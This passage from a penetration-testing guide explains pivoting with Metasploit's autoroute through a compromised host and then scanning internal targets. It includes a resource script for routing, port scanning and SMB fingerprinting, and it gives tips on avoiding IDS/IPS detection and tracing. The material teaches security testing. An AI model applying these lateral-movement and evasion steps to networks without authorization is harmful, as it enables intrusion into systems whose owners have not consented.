Ethical Hacking and Penetration Testing Guide
Pivoting
We have found multiple targets on the same network, but we cannot reach them directly from our machine. Our exploited machine (172.16.222.156) can reach them because it sits on the same network as the other targets, so we route our traffic to those targets through the compromised host. Our machine never sends a packet directly to the other hosts; every connection they see originates from 172.16.222.156, which is what makes this technique hard to trace back to us.
In Meterpreter, the autoroute script (in current Metasploit versions, the post module post/multi/manage/autoroute) adds a route so that Metasploit sends its traffic for a given subnet through the victim's session. To use it from Armitage, type "autoroute" in the search box at the top left of the module browser. Double-click the module and a dialog box asks for the SESSION ID and the SUBNET. For the SESSION ID, enter the Meterpreter session number, in this case 8. The SUBNET is the target network, 172.16.222.0.
The NETMASK option defaults to 255.255.255.0, which matches the subnet of our compromised machine, so we leave it unchanged.
Once the module has run, the route has been added. We can confirm this by viewing Metasploit's own routing table (not the victim's) with the "route print" command in the console; the entry should list subnet 172.16.222.0, netmask 255.255.255.0 and "Session 8" as the gateway.
In Armitage's target graph, the arrows from the compromised host to the other targets indicate that all traffic to them will be sent via our victim.
Scanning Ports and Services and Detecting OS
The next step is to enumerate the targets we have discovered on the internal network: their open ports, the services behind them and their versions, and the operating system of each host.
Armitage makes this easier. Its scan option runs Metasploit's port-scanning modules against the selected hosts, and because the route is in place, the scan traffic goes out through the compromised host, so the targets never see our own address. That does not make the scan invisible: the traffic still crosses the internal network, where an IDS, IPS or other network security device can see it, so I don't recommend running all the modules, since the heavy traffic they generate will trigger those devices.
To run the scan, right-click the host and click "scan". It fires up the scan and returns the open ports, services, versions and operating system detected on the target hosts. You can use this information to find vulnerabilities to exploit the targets and penetrate further into the network.
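The same procedure driven from the Metasploit console instead of the Armitage dialogs, written as a msfconsole resource script. This is an example added here, not code from the book: it covers the autoroute step from the Pivoting section above and the port scan from this section in one run. The session number (8), pivot host (172.16.222.156) and subnet (172.16.222.0/24) come from the chapter; the three internal target addresses and the port list are placeholders assumed for illustration.

```text
# pivot_and_scan.rc -- msfconsole resource script (example, not from the book).
# Assumes Meterpreter session 8 is already open on the pivot host 172.16.222.156
# and that the internal network is 172.16.222.0/24. The target addresses under
# RHOSTS are placeholders; substitute the hosts you discovered earlier.

# 1. Add a route for the internal subnet through session 8.
#    post/multi/manage/autoroute is the module form of the older "run autoroute"
#    Meterpreter script; the manual equivalent is:
#      route add 172.16.222.0 255.255.255.0 8
use post/multi/manage/autoroute
set SESSION 8
set SUBNET 172.16.222.0
set NETMASK 255.255.255.0
run

# 2. Confirm the entry in the framework's routing table (not the victim's).
#    Expected row:  172.16.222.0   255.255.255.0   Session 8
route print

# 3. Port-scan the internal hosts. Because the route exists, Metasploit sends
#    these connections through session 8 and the targets see 172.16.222.156 as
#    the source. Keep THREADS low and PORTS narrow: the traffic still crosses
#    the internal network, where an IDS/IPS can see it.
use auxiliary/scanner/portscan/tcp
set RHOSTS 172.16.222.10 172.16.222.20 172.16.222.30
set PORTS 21,22,23,25,80,135,139,443,445,3389
set THREADS 1
run

# 4. Fingerprint a service found open in step 3 (here SMB, which also reports
#    the operating system of Windows targets).
use auxiliary/scanner/smb/smb_version
set RHOSTS 172.16.222.10 172.16.222.20 172.16.222.30
set THREADS 1
run
```

Run it with `msfconsole -r pivot_and_scan.rc`, or with `resource pivot_and_scan.rc` from a console that already holds session 8. Routes belong to the framework instance that owns the session, so when working from Armitage add them from its own console tab rather than from a separate msfconsole. Only Metasploit modules honour these routes; to push an external tool such as nmap through the pivot, start auxiliary/server/socks_proxy (called socks4a in older releases) and point proxychains at it.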